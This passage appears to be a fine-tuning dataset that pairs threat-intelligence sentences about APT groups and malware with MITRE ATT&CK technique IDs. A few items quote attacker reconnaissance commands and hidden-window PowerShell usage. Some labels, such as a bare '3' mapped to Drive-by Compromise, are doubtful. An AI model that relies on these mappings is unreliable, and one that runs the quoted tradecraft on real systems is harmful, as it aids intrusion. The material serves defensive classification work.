Registry.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 regularly deploys both publicly available and custom password retrieval tools on victims.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Files that are tagged with MOTW are protected and cannot perform certain actions.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tropic Trooper's backdoor has communicated to the C2 over the DNS protocol.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Taidoor can use GetLocalTime and GetSystemTime to collect system time.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,However, if the file is renamed to evil.txt , then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed .### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Derusbi also gathers the username of the victim.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Traffic mirroring is a native feature for some network devices and used for network analysis and may be configured to duplicate traffic and forward to one or more destinations for analysis by a network analyzer or other monitoring device.### Assistant: T1020: Automated Exfiltration" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,* Installing a previously acquired SSL/TLS certificate to use to encrypt command and control traffic with Web Protocols.### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TA551 has used HTTP for C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality.### Assistant: T1495: Firmware Corruption" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly 2.0 added the registry value ntdll to the Registry Run key to establish persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may acquire user credentials from third-party password managers.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries with SYSTEM access to a host may attempt to access Local Security Authority secrets, which can contain a variety of different credential materials, such as credentials for service accounts.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stuxnet collects the IP address of a compromised system.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,One of Dtrack can replace the normal flow of a program execution with malicious code.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Threat Group-3390 has used DLL side-loading, including by using legitimate Kaspersky antivirus variants in which the DLL acts as a stub loader that loads and executes the shell code.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kerrdown has been distributed through malicious e-mail attachments.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ramsay can scan for systems that are vulnerable to the EternalBlue exploit.### Assistant: T1046: Network Service Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleSeed can achieve execution through users running malicious file attachments distributed via email.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The malware also uses return-oriented programming technique and single-byte XOR to obfuscate data.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Waterbear can find the presence of a specific security software.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CallMe has the capability to download a file to the victim from the C2 server.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FinFisher renames one of its .dll files to uxtheme.dll in an apparent attempt to masquerade as a legitimate file.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Emissary has the capability to execute ver and systeminfo commands.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can start a VNC-based remote desktop server and tunnel the connection through the already established C2 channel.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may employ various means to detect and avoid virtualization and analysis environments.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The JavaScript is heavily obfuscated. The first variable—a—is an array of obfuscated values### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Credentials targeted by PinchDuke include ones associated with many sources such as Netscape Navigator, Mozilla Firefox, Mozilla Thunderbird, and Internet Explorer.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leafminer has infected victims using watering holes.### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZLib has the ability to discover and manipulate Windows services.### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An APT28 loader Trojan will enumerate the victim's processes searching for explorer.exe if its current process does not have necessary permissions.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may only need a lightweight setup if most of their activities will take place using online infrastructure.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Information from these sources may reveal opportunities for other forms of reconnaissance or Search Open Websites/Domains, establishing operational resources or Compromise Infrastructure, and/or initial access .### Assistant: T1596: Search Open Technical Databases" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Checks could include generic system properties such as host/domain name and samples of network traffic.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla has used VBS scripts throughout its operations.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Aria-body has the ability to decrypt the loader configuration and payload DLL.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rancor has attached a malicious document to an email to gain initial access.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as Disk Structure Wipe or Inhibit System Recovery, to hasten the intended effects on system availability.### Assistant: T1529: System Shutdown/Reboot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,On network devices, adversaries may use crafted packets to enable Network Device Authentication for standard services offered by the device such as telnet.### Assistant: T1205: Traffic Signaling" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record and Volume Boot Record .### Assistant: T1542: Pre-OS Boot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Both variants need to be executed with the command line argument “[2]” to avoid continually attempting to copy and execute the Trojan using the “tmp.vbs” and “tmp1.vbs” files### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WannaCry scans its local network segment for remote systems to try to exploit and copy itself to.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may target the operating system for a DoS attack, since the is responsible for managing the finite resources on a system.### Assistant: T1499: Endpoint Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN4 has lured victims to click malicious links delivered via spearphishing emails .### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BACKSPACE allows adversaries to search for files.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Helminth has checked the local administrators group.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 1: SpeakUp’s Victim Distribution Figure 2: SpeakUp’s propagation rate per day Infection Vector The initial infection vector is targeting the recently reported vulnerability in ThinkPHP and uses command injection techniques for uploading a PHP shell that serves and executes a Perl backdoor### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has collected clipboard data in plaintext.### Assistant: T1115: Clipboard Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWERSTATS can use DCOM to execute additional payloads on compromised hosts.### Assistant: T1559: Inter-Process Communication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may execute their own malicious payloads by hijacking the binaries used by services.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Micropsia can download and execute an executable from the C2 server.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NotPetya uses rundll32.exe to install itself on remote systems when accessed via PsExec or wmic.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sharpshooter has leveraged embedded shellcode to inject a downloader into the memory of Word.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Using this example, Comnie will then request data to supply to the BAT script, via the following decrypted request: h=HOSTNAME-PC&f=gethostinfo.bat&c=& Based on network traffic witnessed, the remote C2 server was found to respond with the following information: netstat -ano > %TEMP%\info.datipconfig /all >> %TEMP%\info.datroute PRINT >> %TEMP%\info.datnet view >> %TEMP%\info.dattasklist >> %TEMP%\info.datnet user >> %TEMP%\info.datnet start >> %TEMP%\info.dat   This script is written to a temporary file prior to be executed### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SeaDuke can securely delete files, including deleting itself from the victim.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,One example of this is powershell.exe -WindowStyle Hidden.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has used pass the hash for lateral movement.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kazuar uses /bin/bash to execute commands on the victim’s machine.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These files are downloaded to a directory (C:\Users\Public\Libraries\tempsys) on the infected machine by Bxaki() and xparis()### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SharpStage has decompressed data received from the C2 server.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has deleted logs and executable files used during an intrusion.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Naikon has used schtasks.exe for lateral movement in compromised networks.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Domain trust details, such as whether or not a domain is federated, allow authentication and authorization properties to apply between domains for the purpose of accessing shared resources.### Assistant: T1484: Domain Policy Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SynAck parses the export tables of system DLLs to locate and call various Windows API functions.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MobileOrder has a command to download a file from the C2 server to the victim mobile device's SD card.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cannon can gather the username from the system.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 collected the victim's username and executed the whoami command on the victim's machine.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Browser pivoting may also bypass security provided by 2-factor authentication.### Assistant: T1185: Browser Session Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 has used the meek domain fronting plugin for Tor to hide the destination of C2 traffic.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kivars has the ability to download and execute files.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,StrongPity can parse the hard drive on a compromised host to identify specific file extensions.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AutoIt backdoor attempts to escalate privileges by bypassing User Access Control.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stolen Pencil utilized RDP for direct remote point-and-click access.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN6 has used Pastebin and Google Storage to host content for their operations.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bandook has used AES encryption for C2 communication.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,StoneDrill can wipe the master boot record of an infected computer.### Assistant: T1561: Disk Wipe" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RDAT has executed commands using cmd.exe /c.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cloud providers may have different ways in which their virtual networks operate.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ChChes samples were digitally signed with a certificate originally used by Hacking Team that was later leaked and subsequently revoked.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OSX_OCEANLOTUS.D has a command to delete a file from the system.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group has used VBScript to gather information about a victim machine.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ROKRAT gathers the computer name and checks the OS version to ensure it doesn’t run on a Windows XP or Windows Server 2003 systems.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HiddenWasp creates a user account as a means to provide initial persistence to the compromised machine.### Assistant: T1136: Create Account" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,gh0st RAT has the capability to list processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Information from these sources may reveal opportunities for other forms of reconnaissance or Search Open Technical Databases, establishing operational resources or Compromise Accounts, and/or initial access .### Assistant: T1593: Search Open Websites/Domains" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Passwords are stored in several places on a system, depending on the operating system or application holding the credentials.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bisonal can execute ipconfig on the victim’s machine.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can determine if the user on an infected machine is in the admin or domain admin group.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can SSH to a remote service.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Okrum was seen using a RAR archiver tool to compress/decompress data.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ursnif has deleted data staged in tmp files after exfiltration.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT15 was also observed using Mimikatz to dump credentials and generate Kerberos golden tickets### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If so, access is granted.### Assistant: T1556: Modify Authentication Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some aspects of malware development, such as C2 protocol development, may require adversaries to obtain additional infrastructure.### Assistant: T1587: Develop Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pony also obfuscates the memory flow by adding junk instructions when executing to make analysis more difficult.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PlugX has a module to enumerate drives and find files recursively.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Blue Mockingbird has used XMRIG to mine cryptocurrency on victim systems.### Assistant: T1496: Resource Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT19 used -W Hidden to conceal PowerShell windows by setting the WindowStyle parameter to hidden.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dtrack can remove its persistence and delete itself.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also name images a certain way to increase the chance of users mistakenly deploying an instance or container from the image .### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Screenshot in leak of administrative panel for an account at DeltaHost If we use the filename of this screenshot and assume that it was taken on March 29, 2019 and subtract 194 days from this date, it is possible that this server had been operational since at least September 16, 2018### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse TxF to a perform a file-less variation of Process Injection.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Avaddon uses registry run keys for persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Astaroth has used a DGA in C2 communications.### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Emissary has the capability to download files from the C2 server.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stealth Falcon malware gathers system information via Windows Management Instrumentation .### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PowerShell scripts that perform system reconnaissance and credential theft from Windows Credential Manager and then send this information back to Waterbug C& Cs.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may choose to use custom archival methods, such as encryption with XOR or stream ciphers implemented with no external library or utility references.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PUNCHTRACK aggregates collected data in a tmp file.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole can decrypt, unpack and load a DLL from its resources, or from blobs encrypted with Data Protection API, two-key triple DES, and variations of the XOR cipher.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In this context the main function is executed.""Console"": with the argument, a persistence is configured and the malware will be executed at the next reboot ( HKCU\Software\Microsoft\Windows\CurrentVersion\Run\runsample ).""Sample"": with this argument, the malware executes the console command followed by the help command.The information collected is performed using WMI queries:Additionally the malware lists the running process via the Microsoft Windows API### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This behavior is distinct from Data Destruction because sections of the disk are erased instead of individual files.### Assistant: T1561: Disk Wipe" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A module in Prikormka collects information about the paths, size, and creation time of files with specific file extensions, but not the actual content of the file.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It is the location of the boot loader.### Assistant: T1542: Pre-OS Boot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts; however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig has used keylogging tools called KEYPUNCH and LONGWATCH.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Fox Kitten has used Angry IP Scanner to detect remote systems.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Magic Hound has created fake LinkedIn and other social media accounts to contact targets and convince them--through messages and voice communications--to open malicious links.### Assistant: T1585: Establish Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Writing executables to a randomly-selected directory under Program Files, and naming the EXE to match the chosen directory name, or, if that fails, writing the executable to a system-generated temporary file name, using the EXE extension 3### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rocke has modified UPX headers after packing files to break unpackers.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,* CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has used cmd.exe net user /domain to enumerate domain users.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,menuPass executes commands using a command-line interface and reverse shell.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These digital certificates are often issued in the name of rogue and legitimate companies to avoid arousing suspicion from researchers and incident responders### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has used tools to take screenshots from victims.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This command adds the path of the malicious executable to the login item file list located in ~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SMOKEDHAM has used reg.exe to create a Registry Run key.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TajMahal has the ability to capture webcam video.### Assistant: T1125: Video Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bundlore will enumerate the macOS version to determine which follow-on behaviors to execute using /usr/bin/sw_vers -productVersion.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla has used valid digital certificates from Sysprint AG to sign its Epic dropper.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware.### Assistant: T1610: Deploy Container" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Attackers may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,3### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WastedLocker has the ability to save and execute files as an alternate data stream .### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WannaCry uses an exploit in SMBv1 to spread itself to other remote systems on a network.### Assistant: T1210: Exploitation of Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RDAT can exfiltrate data gathered from the infected system via the established Exchange Web Services API C2 channel.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,H1N1 uses multiple techniques to obfuscate strings, including XOR.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN8 has used emails with malicious links to lure victims into installing malware.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The DropIt Trojan we analyzed is an executable that builds an embedded executable by decoding embedded blobs of base64 encoded data and concatenating them together in the correct order### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GuLoader has the ability to perform anti-debugging based on time checks, API calls, and CPUID.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Magic Hound has collected .PST archives.### Assistant: T1114: Email Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The group has previously exploited CVE-2017-8570, CVE-2012-1856, CVE-2014-4114, CVE-2017-0199, CVE-2017-11882, and CVE-2015-1641.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Astaroth uses a software packer called Pe123\RPolyCryptor.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it’s a vanilla image.### Assistant: T1612: Build Image on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole has undergone regular technical improvements in an attempt to evade detection.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ebury has intercepted unencrypted private keys as well as private key pass-phrases.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 has used tools with the ability to search for files on a compromised host.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BackdoorDiplomacy has used an executable to detect removable media, such as USB flash drives.### Assistant: T1120: Peripheral Device Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If the machine has the value 0x419 , 0x422 , or 0x423 , it stops execution.### Assistant: T1614: System Location Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Fox Kitten has accessed Registry hives ntuser.dat and UserClass.dat.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Metamorfo has deleted itself from the system after execution.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole has executed legitimate tools in hidden windows.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BackdoorDiplomacy has dropped legitimate software onto a compromised host and used it to execute malicious DLLs.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The macro uses PowerShell to download a shellcode-based payload from a remote server using one of two available techniques### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may bypass UAC mechanisms to elevate process privileges on system.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MechaFlounder has the ability to identify the username and hostname on a compromised host.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PoetRAT has the ability to take screen captures.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,yty has some basic anti-sandbox detection that tries to detect Virtual PC, Sandboxie, and VMware.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dipsind encrypts C2 data with AES256 in ECB mode.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Users may use valid credentials to log into a service specifically designed to accept remote connections, such as telnet, SSH, and RDP.### Assistant: T1563: Remote Service Session Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Valak has downloaded a variety of modules and payloads to the compromised host, including IcedID and NetSupport Manager RAT-based malware.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BLUELIGHT can download additional files onto the host.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly 2.0 has used various forms of spearphishing in attempts to get users to open attachments.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has used VBScript to run WMI queries.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Helminth has checked for the domain admin group and Exchange Trusted Subsystem groups using the commands net group Exchange Trusted Subsystem /domain and net group domain admins /domain.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN7 has registered look-alike domains for use in phishing campaigns.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The payload will construct a message that has the following structure that it will then send to the C2:   byed   The message above is sent via a simple HTTPS/HTTP POST request to the C2 server### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to find local system groups and permission settings.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leviathan has used regsvr32 for execution.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,China Chopper's server component executes code sent via HTTP POST commands.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KillDisk terminates various processes to get the user to reboot the victim machine.### Assistant: T1489: Service Stop" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The payload of the malicious driver is executed when loaded by lsass.exe before the spoofed service becomes unstable and crashes.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lokibot can search for specific files on an infected host.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group malware families can also enumerate files and directories, including a Destover-like variant that lists files and gathers information for all drives.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dark Caracal has used macros in Word documents that would download a second stage if executed.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and 